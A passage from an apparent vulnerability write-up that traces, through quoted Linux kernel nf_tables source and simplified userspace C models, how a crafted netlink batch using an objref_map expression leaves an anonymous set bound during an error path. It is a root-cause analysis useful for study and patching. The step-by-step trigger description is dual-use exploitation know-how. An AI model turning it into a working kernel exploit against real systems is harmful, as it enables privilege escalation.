        <span class="n">trans</span> <span class="o">=</span> <span class="n">nft_trans_elem_alloc</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">NFT_MSG_NEWSETELEM</span><span class="p">,</span> <span class="n">set</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">trans</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
                <span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">ENOMEM</span><span class="p">;</span>
                <span class="k">goto</span> <span class="n">err_elem_expr</span><span class="p">;</span>
        <span class="p">}</span>
        <span class="p">...</span>
        <span class="n">nft_trans_elem</span><span class="p">(</span><span class="n">trans</span><span class="p">)</span> <span class="o">=</span> <span class="n">elem</span><span class="p">;</span>
        <span class="n">nft_trans_commit_list_add_tail</span><span class="p">(</span><span class="n">ctx</span><span class="o">-&gt;</span><span class="n">net</span><span class="p">,</span> <span class="n">trans</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">3</span><span class="p">]</span>
        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
        <span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>
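<p>The state of the commit list after these two messages can be pictured with a small userspace model. This is only a sketch under simplifying assumptions: the kernel uses <code class="language-plaintext highlighter-rouge">struct list_head</code> and allocates each <code class="language-plaintext highlighter-rouge">nft_trans</code> dynamically, whereas the hypothetical <code class="language-plaintext highlighter-rouge">commit_list</code>, <code class="language-plaintext highlighter-rouge">trans</code>, <code class="language-plaintext highlighter-rouge">queue_new_obj</code> and <code class="language-plaintext highlighter-rouge">queue_new_set_elem</code> below use a plain singly linked list and caller-provided storage.</p>

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical userspace stand-ins for the kernel structures. */
struct object {
    unsigned int use;        /* reference count, like obj->use */
};

struct set_elem {
    struct object *objref;   /* NULL when the element references no object */
};

enum trans_kind { TRANS_NEWOBJ, TRANS_NEWSETELEM };

struct trans {
    enum trans_kind kind;
    void *payload;           /* the object or set element being created */
    struct trans *next;
};

struct commit_list {
    struct trans *head;
    struct trans *tail;
    size_t len;
};

/* Append a pending transaction, mirroring list_add_tail() on commit_list. */
static void commit_list_add_tail(struct commit_list *cl, struct trans *t)
{
    assert(cl != NULL && t != NULL);
    t->next = NULL;
    if (cl->tail != NULL)
        cl->tail->next = t;
    else
        cl->head = t;
    cl->tail = t;
    cl->len++;
}

/* Queue the creation of an object. */
static void queue_new_obj(struct commit_list *cl, struct trans *t,
                          struct object *obj)
{
    t->kind = TRANS_NEWOBJ;
    t->payload = obj;
    commit_list_add_tail(cl, t);
}

/* Queue the creation of a set element that may reference an object. */
static void queue_new_set_elem(struct commit_list *cl, struct trans *t,
                               struct set_elem *elem, struct object *obj)
{
    elem->objref = obj;
    if (obj != NULL)
        obj->use++;          /* the element now holds a reference */
    t->kind = TRANS_NEWSETELEM;
    t->payload = elem;
    commit_list_add_tail(cl, t);
}
```

<p>Calling <code class="language-plaintext highlighter-rouge">queue_new_obj</code> and then <code class="language-plaintext highlighter-rouge">queue_new_set_elem</code> with the same object leaves two entries on the list, in that order, and the object's <code class="language-plaintext highlighter-rouge">use</code> count raised by one. Both the pending transaction and the set element now point at the same object.</p>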

<p>The third netlink message in our batch creates a second <code class="language-plaintext highlighter-rouge">nft_set_elem</code>, this time with an expression in it. To be clear, we don’t specify an object for this set elem to reference. In the same code block above, we can see that <code class="language-plaintext highlighter-rouge">nft_set_elem_expr_alloc</code> (the buggy function) is called when the netlink message contains a netlink attribute for an expression. The function (shown again) initializes the expression with <code class="language-plaintext highlighter-rouge">nft_expr_init</code> [1], and if <code class="language-plaintext highlighter-rouge">expr-&gt;ops-&gt;type-&gt;flags</code> [2] does not contain the <code class="language-plaintext highlighter-rouge">NFT_EXPR_STATEFUL</code> flag, the expression is destroyed and an error is returned.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="nf">nft_set_elem_expr_alloc</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span>
                                         <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_set</span> <span class="o">*</span><span class="n">set</span><span class="p">,</span>
                                         <span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span><span class="n">attr</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="n">expr</span><span class="p">;</span>
        <span class="kt">int</span> <span class="n">err</span><span class="p">;</span>

        <span class="n">expr</span> <span class="o">=</span> <span class="n">nft_expr_init</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">attr</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">IS_ERR</span><span class="p">(</span><span class="n">expr</span><span class="p">))</span>
                <span class="k">return</span> <span class="n">expr</span><span class="p">;</span>

        <span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">EOPNOTSUPP</span><span class="p">;</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">expr</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">type</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">NFT_EXPR_STATEFUL</span><span class="p">))</span>   <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
                <span class="k">goto</span> <span class="n">err_set_elem_expr</span><span class="p">;</span>

        <span class="k">if</span> <span class="p">(</span><span class="n">expr</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">type</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">NFT_EXPR_GC</span><span class="p">)</span> <span class="p">{</span>
                <span class="k">if</span> <span class="p">(</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">NFT_SET_TIMEOUT</span><span class="p">)</span>
                        <span class="k">goto</span> <span class="n">err_set_elem_expr</span><span class="p">;</span>
                <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">gc_init</span><span class="p">)</span>
                        <span class="k">goto</span> <span class="n">err_set_elem_expr</span><span class="p">;</span>
                <span class="n">set</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">gc_init</span><span class="p">(</span><span class="n">set</span><span class="p">);</span>
        <span class="p">}</span>

        <span class="k">return</span> <span class="n">expr</span><span class="p">;</span>

<span class="nl">err_set_elem_expr:</span>
        <span class="n">nft_expr_destroy</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">expr</span><span class="p">);</span>
        <span class="k">return</span> <span class="n">ERR_PTR</span><span class="p">(</span><span class="n">err</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Even if the expression we try to create does not have the <code class="language-plaintext highlighter-rouge">NFT_EXPR_STATEFUL</code> flag, <code class="language-plaintext highlighter-rouge">nft_expr_init</code> is still called first. If we create an expression of <code class="language-plaintext highlighter-rouge">nft_objref_type</code> that has <code class="language-plaintext highlighter-rouge">nft_objref_map_ops</code>, we can see that the type does not set such a flag.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_expr_ops</span> <span class="n">nft_objref_map_ops</span> <span class="o">=</span> <span class="p">{</span>
        <span class="p">.</span><span class="n">type</span>           <span class="o">=</span> <span class="o">&amp;</span><span class="n">nft_objref_type</span><span class="p">,</span>
        <span class="p">.</span><span class="n">size</span>           <span class="o">=</span> <span class="n">NFT_EXPR_SIZE</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">nft_objref_map</span><span class="p">)),</span>
        <span class="p">.</span><span class="n">eval</span>           <span class="o">=</span> <span class="n">nft_objref_map_eval</span><span class="p">,</span>
        <span class="p">.</span><span class="n">init</span>           <span class="o">=</span> <span class="n">nft_objref_map_init</span><span class="p">,</span>
        <span class="p">.</span><span class="n">activate</span>       <span class="o">=</span> <span class="n">nft_objref_map_activate</span><span class="p">,</span>
        <span class="p">.</span><span class="n">deactivate</span>     <span class="o">=</span> <span class="n">nft_objref_map_deactivate</span><span class="p">,</span>
        <span class="p">.</span><span class="n">destroy</span>        <span class="o">=</span> <span class="n">nft_objref_map_destroy</span><span class="p">,</span>
        <span class="p">.</span><span class="n">dump</span>           <span class="o">=</span> <span class="n">nft_objref_map_dump</span><span class="p">,</span>
<span class="p">};</span>

<span class="k">static</span> <span class="k">struct</span> <span class="n">nft_expr_type</span> <span class="n">nft_objref_type</span> <span class="n">__read_mostly</span> <span class="o">=</span> <span class="p">{</span>
        <span class="p">.</span><span class="n">name</span>           <span class="o">=</span> <span class="s">"objref"</span><span class="p">,</span>
        <span class="p">.</span><span class="n">select_ops</span>     <span class="o">=</span> <span class="n">nft_objref_select_ops</span><span class="p">,</span>
        <span class="p">.</span><span class="n">policy</span>         <span class="o">=</span> <span class="n">nft_objref_policy</span><span class="p">,</span>
        <span class="p">.</span><span class="n">maxattr</span>        <span class="o">=</span> <span class="n">NFTA_OBJREF_MAX</span><span class="p">,</span>
        <span class="p">.</span><span class="n">owner</span>          <span class="o">=</span> <span class="n">THIS_MODULE</span><span class="p">,</span>
<span class="p">};</span>
</code></pre></div></div>
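<p>The flag is absent because the type definition has no <code class="language-plaintext highlighter-rouge">.flags</code> initializer, and C zero-initializes any member omitted from a designated initializer. A minimal sketch of that behaviour follows, using a hypothetical <code class="language-plaintext highlighter-rouge">expr_type</code> struct and an illustrative <code class="language-plaintext highlighter-rouge">EXPR_STATEFUL</code> value rather than the kernel definitions:</p>

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

#define EXPR_STATEFUL 0x1u  /* illustrative stand-in for NFT_EXPR_STATEFUL */

/* Hypothetical, cut-down stand-in for struct nft_expr_type. */
struct expr_type {
    const char *name;
    unsigned int flags;
};

/* No .flags initializer: the omitted member is zero-initialized. */
static const struct expr_type objref_like = {
    .name = "objref",
};

/* A type that does opt in to the stateful flag, for comparison. */
static const struct expr_type stateful_like = {
    .name  = "stateful-example",
    .flags = EXPR_STATEFUL,
};

/* Mirrors the condition at [2]: true when the type would be rejected. */
static bool rejected_as_non_stateful(const struct expr_type *type)
{
    assert(type != NULL);
    return !(type->flags & EXPR_STATEFUL);
}
```

<p>Here <code class="language-plaintext highlighter-rouge">rejected_as_non_stateful(&amp;objref_like)</code> is true while <code class="language-plaintext highlighter-rouge">rejected_as_non_stateful(&amp;stateful_like)</code> is false, so a type declared like <code class="language-plaintext highlighter-rouge">nft_objref_type</code> takes the error path at [2].</p>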

<p>But when <code class="language-plaintext highlighter-rouge">nft_expr_init</code> is called, it parses the expression data, allocates space for it and finally calls <code class="language-plaintext highlighter-rouge">nf_tables_newexpr</code> [1] which just calls the init function of the particular ops for that expression.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="nf">nft_expr_init</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span>
                                      <span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span><span class="n">nla</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">struct</span> <span class="n">nft_expr_info</span> <span class="n">expr_info</span><span class="p">;</span>
        <span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="n">expr</span><span class="p">;</span>
        <span class="k">struct</span> <span class="n">module</span> <span class="o">*</span><span class="n">owner</span><span class="p">;</span>
        <span class="kt">int</span> <span class="n">err</span><span class="p">;</span>

        <span class="n">err</span> <span class="o">=</span> <span class="n">nf_tables_expr_parse</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">nla</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">expr_info</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
                <span class="k">goto</span> <span class="n">err1</span><span class="p">;</span>

        <span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">ENOMEM</span><span class="p">;</span>
        <span class="n">expr</span> <span class="o">=</span> <span class="n">kzalloc</span><span class="p">(</span><span class="n">expr_info</span><span class="p">.</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">size</span><span class="p">,</span> <span class="n">GFP_KERNEL</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">expr</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span>
                <span class="k">goto</span> <span class="n">err2</span><span class="p">;</span>

        <span class="n">err</span> <span class="o">=</span> <span class="n">nf_tables_newexpr</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">expr_info</span><span class="p">,</span> <span class="n">expr</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
                <span class="k">goto</span> <span class="n">err3</span><span class="p">;</span>

        <span class="k">return</span> <span class="n">expr</span><span class="p">;</span>
        <span class="p">...</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kt">int</span> <span class="nf">nf_tables_newexpr</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span>
                             <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_expr_info</span> <span class="o">*</span><span class="n">expr_info</span><span class="p">,</span>
                             <span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="n">expr</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_expr_ops</span> <span class="o">*</span><span class="n">ops</span> <span class="o">=</span> <span class="n">expr_info</span><span class="o">-&gt;</span><span class="n">ops</span><span class="p">;</span>
        <span class="kt">int</span> <span class="n">err</span><span class="p">;</span>

        <span class="n">expr</span><span class="o">-&gt;</span><span class="n">ops</span> <span class="o">=</span> <span class="n">ops</span><span class="p">;</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">init</span><span class="p">)</span> <span class="p">{</span>
                <span class="n">err</span> <span class="o">=</span> <span class="n">ops</span><span class="o">-&gt;</span><span class="n">init</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">expr</span><span class="p">,</span> <span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">**</span><span class="p">)</span><span class="n">expr_info</span><span class="o">-&gt;</span><span class="n">tb</span><span class="p">);</span>
                <span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
                        <span class="k">goto</span> <span class="n">err1</span><span class="p">;</span>
        <span class="p">}</span>

        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="nl">err1:</span>
        <span class="n">expr</span><span class="o">-&gt;</span><span class="n">ops</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
        <span class="k">return</span> <span class="n">err</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>For an <code class="language-plaintext highlighter-rouge">objref_map</code> expression, <code class="language-plaintext highlighter-rouge">ops-&gt;init</code> is <code class="language-plaintext highlighter-rouge">nft_objref_map_init</code>, which looks up the set that the expression refers to and then calls <code class="language-plaintext highlighter-rouge">nf_tables_bind_set</code> on that set.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">nft_objref_map_init</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span>
                               <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="n">expr</span><span class="p">,</span>
                               <span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span> <span class="k">const</span> <span class="n">tb</span><span class="p">[])</span>
<span class="p">{</span>
        <span class="p">...</span>
        <span class="n">set</span> <span class="o">=</span> <span class="n">nft_set_lookup_global</span><span class="p">(</span><span class="n">ctx</span><span class="o">-&gt;</span><span class="n">net</span><span class="p">,</span> <span class="n">ctx</span><span class="o">-&gt;</span><span class="n">table</span><span class="p">,</span>
                                    <span class="n">tb</span><span class="p">[</span><span class="n">NFTA_OBJREF_SET_NAME</span><span class="p">],</span>
                                    <span class="n">tb</span><span class="p">[</span><span class="n">NFTA_OBJREF_SET_ID</span><span class="p">],</span> <span class="n">genmask</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">IS_ERR</span><span class="p">(</span><span class="n">set</span><span class="p">))</span>
                <span class="k">return</span> <span class="n">PTR_ERR</span><span class="p">(</span><span class="n">set</span><span class="p">);</span>
        <span class="p">...</span>
        <span class="n">err</span> <span class="o">=</span> <span class="n">nf_tables_bind_set</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">set</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">priv</span><span class="o">-&gt;</span><span class="n">binding</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
                <span class="k">return</span> <span class="n">err</span><span class="p">;</span>

        <span class="n">priv</span><span class="o">-&gt;</span><span class="n">set</span> <span class="o">=</span> <span class="n">set</span><span class="p">;</span>
        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">nf_tables_bind_set</code> first rejects an anonymous set (one with the <code class="language-plaintext highlighter-rouge">NFT_SET_ANONYMOUS</code> flag, which is configurable by the <code class="language-plaintext highlighter-rouge">nf_tables</code> API user) that already has a binding [1], then adds the new binding to the set’s bindings list [2] and calls <code class="language-plaintext highlighter-rouge">nft_set_trans_bind</code>. For an anonymous set, <code class="language-plaintext highlighter-rouge">nft_set_trans_bind</code> walks the <code class="language-plaintext highlighter-rouge">nft_trans</code> objects currently in the <code class="language-plaintext highlighter-rouge">nft_net-&gt;commit_list</code> [3]. If an <code class="language-plaintext highlighter-rouge">nft_trans</code> was created by adding a new <code class="language-plaintext highlighter-rouge">nft_set_elem</code> to this set (a netlink message of type <code class="language-plaintext highlighter-rouge">NFT_MSG_NEWSETELEM</code>), it is marked as bound [4]. Since the <code class="language-plaintext highlighter-rouge">nft_net-&gt;commit_list</code> at this point already contains the <code class="language-plaintext highlighter-rouge">nft_trans</code> for that first <code class="language-plaintext highlighter-rouge">nft_set_elem</code>, which holds a reference to the <code class="language-plaintext highlighter-rouge">nft_object</code> we created, that set elem will be bound.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">nf_tables_bind_set</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span> <span class="k">struct</span> <span class="n">nft_set</span> <span class="o">*</span><span class="n">set</span><span class="p">,</span>
                       <span class="k">struct</span> <span class="n">nft_set_binding</span> <span class="o">*</span><span class="n">binding</span><span class="p">)</span>
<span class="p">{</span>
        <span class="p">...</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">list_empty</span><span class="p">(</span><span class="o">&amp;</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">bindings</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="n">nft_set_is_anonymous</span><span class="p">(</span><span class="n">set</span><span class="p">))</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
                <span class="k">return</span> <span class="o">-</span><span class="n">EBUSY</span><span class="p">;</span>
        <span class="p">...</span>
<span class="nl">bind:</span>
        <span class="p">...</span>
        <span class="n">list_add_tail_rcu</span><span class="p">(</span><span class="o">&amp;</span><span class="n">binding</span><span class="o">-&gt;</span><span class="n">list</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">bindings</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
        <span class="n">nft_set_trans_bind</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">set</span><span class="p">);</span>
        <span class="n">set</span><span class="o">-&gt;</span><span class="n">use</span><span class="o">++</span><span class="p">;</span>

        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>


<span class="k">static</span> <span class="kt">void</span> <span class="nf">nft_set_trans_bind</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span> <span class="k">struct</span> <span class="n">nft_set</span> <span class="o">*</span><span class="n">set</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">struct</span> <span class="n">nftables_pernet</span> <span class="o">*</span><span class="n">nft_net</span><span class="p">;</span>
        <span class="k">struct</span> <span class="n">net</span> <span class="o">*</span><span class="n">net</span> <span class="o">=</span> <span class="n">ctx</span><span class="o">-&gt;</span><span class="n">net</span><span class="p">;</span>
        <span class="k">struct</span> <span class="n">nft_trans</span> <span class="o">*</span><span class="n">trans</span><span class="p">;</span>

        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">nft_set_is_anonymous</span><span class="p">(</span><span class="n">set</span><span class="p">))</span>
                <span class="k">return</span><span class="p">;</span>

        <span class="n">nft_net</span> <span class="o">=</span> <span class="n">nft_pernet</span><span class="p">(</span><span class="n">net</span><span class="p">);</span>
        <span class="n">list_for_each_entry_reverse</span><span class="p">(</span><span class="n">trans</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">nft_net</span><span class="o">-&gt;</span><span class="n">commit_list</span><span class="p">,</span> <span class="n">list</span><span class="p">)</span> <span class="p">{</span>   <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">3</span><span class="p">]</span>
                <span class="k">switch</span> <span class="p">(</span><span class="n">trans</span><span class="o">-&gt;</span><span class="n">msg_type</span><span class="p">)</span> <span class="p">{</span>
                <span class="k">case</span> <span class="n">NFT_MSG_NEWSET</span><span class="p">:</span>
                        <span class="k">if</span> <span class="p">(</span><span class="n">nft_trans_set</span><span class="p">(</span><span class="n">trans</span><span class="p">)</span> <span class="o">==</span> <span class="n">set</span><span class="p">)</span>
                                <span class="n">nft_trans_set_bound</span><span class="p">(</span><span class="n">trans</span><span class="p">)</span> <span class="o">=</span> <span class="nb">true</span><span class="p">;</span>
                        <span class="k">break</span><span class="p">;</span>
                <span class="k">case</span> <span class="n">NFT_MSG_NEWSETELEM</span><span class="p">:</span>
                        <span class="k">if</span> <span class="p">(</span><span class="n">nft_trans_elem_set</span><span class="p">(</span><span class="n">trans</span><span class="p">)</span> <span class="o">==</span> <span class="n">set</span><span class="p">)</span>
                                <span class="n">nft_trans_elem_set_bound</span><span class="p">(</span><span class="n">trans</span><span class="p">)</span> <span class="o">=</span> <span class="nb">true</span><span class="p">;</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">4</span><span class="p">]</span>
                        <span class="k">break</span><span class="p">;</span>
                <span class="p">}</span>
        <span class="p">}</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kr">inline</span> <span class="n">bool</span> <span class="nf">nft_set_is_anonymous</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_set</span> <span class="o">*</span><span class="n">set</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">return</span> <span class="n">set</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">NFT_SET_ANONYMOUS</span><span class="p">;</span>
<span class="p">}</span>

<span class="cp">#define nft_trans_elem_set_bound(trans) \
        (((struct nft_trans_elem *)trans-&gt;data)-&gt;bound)
</span></code></pre></div></div>
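<p>To make the bound-marking step easier to follow, here is a minimal userspace sketch of it. It is a simplified model and not kernel code: <code class="language-plaintext highlighter-rouge">model_set</code>, <code class="language-plaintext highlighter-rouge">model_trans</code> and <code class="language-plaintext highlighter-rouge">model_set_trans_bind</code> are hypothetical names I made up for illustration, and the commit list is assumed to be a plain array instead of a kernel linked list.</p>

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical userspace stand-ins; these are NOT the kernel definitions. */
enum model_msg { MODEL_NEWSET, MODEL_NEWSETELEM, MODEL_NEWOBJ };

struct model_set {
    bool anonymous;              /* stand-in for the NFT_SET_ANONYMOUS flag */
};

struct model_trans {
    enum model_msg msg_type;
    struct model_set *set;       /* set this transaction touches, or NULL */
    bool bound;
};

/*
 * Walk the pending transactions newest-first and flag every NEWSET or
 * NEWSETELEM transaction that touches `set`. Does nothing for a set that
 * is not anonymous. Returns how many transactions were flagged.
 */
static size_t model_set_trans_bind(struct model_trans *commit, size_t n,
                                   const struct model_set *set)
{
    size_t flagged = 0;

    if (!set->anonymous)
        return 0;

    for (size_t i = n; i-- > 0; ) {
        struct model_trans *t = &commit[i];

        if ((t->msg_type == MODEL_NEWSET ||
             t->msg_type == MODEL_NEWSETELEM) && t->set == set) {
            t->bound = true;
            flagged++;
        }
    }
    return flagged;
}
```

<p>With a commit array holding one object transaction followed by one set elem transaction for an anonymous set, calling <code class="language-plaintext highlighter-rouge">model_set_trans_bind</code> on that set flags only the set elem transaction, which mirrors the state we are in after the bind.</p>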

<p>After <code class="language-plaintext highlighter-rouge">nft_expr_init</code> returns, execution flow is back in <code class="language-plaintext highlighter-rouge">nft_set_elem_expr_alloc</code>, which bails out [1] with an error because the <code class="language-plaintext highlighter-rouge">objref_map</code> expression we tried to create does not have the <code class="language-plaintext highlighter-rouge">NFT_EXPR_STATEFUL</code> flag. The error path invokes <code class="language-plaintext highlighter-rouge">nft_expr_destroy</code> [2], which for an <code class="language-plaintext highlighter-rouge">objref_map</code> expression eventually calls <code class="language-plaintext highlighter-rouge">nft_objref_map_destroy-&gt;nf_tables_destroy_set</code>. That function only destroys an anonymous set whose bindings list is empty [3], so the set survives because it still has a binding.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="nf">nft_set_elem_expr_alloc</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span>
                                         <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_set</span> <span class="o">*</span><span class="n">set</span><span class="p">,</span>
                                         <span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span><span class="n">attr</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="n">expr</span><span class="p">;</span>
        <span class="kt">int</span> <span class="n">err</span><span class="p">;</span>

        <span class="n">expr</span> <span class="o">=</span> <span class="n">nft_expr_init</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">attr</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">IS_ERR</span><span class="p">(</span><span class="n">expr</span><span class="p">))</span>
                <span class="k">return</span> <span class="n">expr</span><span class="p">;</span>

        <span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">EOPNOTSUPP</span><span class="p">;</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">expr</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">type</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">NFT_EXPR_STATEFUL</span><span class="p">))</span>
                <span class="k">goto</span> <span class="n">err_set_elem_expr</span><span class="p">;</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>

        <span class="k">if</span> <span class="p">(</span><span class="n">expr</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">type</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">NFT_EXPR_GC</span><span class="p">)</span> <span class="p">{</span>
                <span class="k">if</span> <span class="p">(</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">NFT_SET_TIMEOUT</span><span class="p">)</span>
                        <span class="k">goto</span> <span class="n">err_set_elem_expr</span><span class="p">;</span>
                <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">gc_init</span><span class="p">)</span>
                        <span class="k">goto</span> <span class="n">err_set_elem_expr</span><span class="p">;</span>
                <span class="n">set</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">gc_init</span><span class="p">(</span><span class="n">set</span><span class="p">);</span>
        <span class="p">}</span>

        <span class="k">return</span> <span class="n">expr</span><span class="p">;</span>

